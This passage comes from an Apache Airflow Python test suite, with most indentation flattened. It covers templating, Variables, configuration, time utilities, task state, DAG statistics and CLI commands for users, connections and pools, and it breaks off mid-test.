def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEquals(context['ds'], '2015-01-01')
self.assertEquals(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEquals(context['next_ds'], '2015-01-02')
self.assertEquals(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEquals(context['prev_ds'], '2014-12-31')
self.assertEquals(context['prev_ds_nodash'], '20141231')
self.assertEquals(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEquals(context['ts_nodash'], '20150101T000000+0000')
self.assertEquals(context['yesterday_ds'], '2014-12-31')
self.assertEquals(context['yesterday_ds_nodash'], '20141231')
self.assertEquals(context['tomorrow_ds'], '2015-01-02')
self.assertEquals(context['tomorrow_ds_nodash'], '20150102')
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
        # Check that the returned value and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEquals(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEquals(dag_run.execution_date, utc_now)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
configuration.load_test_config()
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test'
])
cli.users(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
args = self.parser.parse_args([
'users', '-d', '--username', 'test3',
])
cli.users(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'users', '-c', '--username', 'user{}'.format(i), '--lastname',
'doe', '--firstname', 'jon',
'--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
'--use_random_password'
])
cli.users(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.users(self.parser.parse_args(['users', '-l']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_sync_perm(self):
# test whether sync_perm cli will throw exceptions or not
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
            conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
        # Prepare to verify the connections added above
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
        # Verify the added connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
        # Attempt to delete a non-existing connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator',
'-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as f:
json.dump(pool_config_input, f)
# Import json
try:
cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool -i pools_import.json' failed: %s" % e)
# Export json
try:
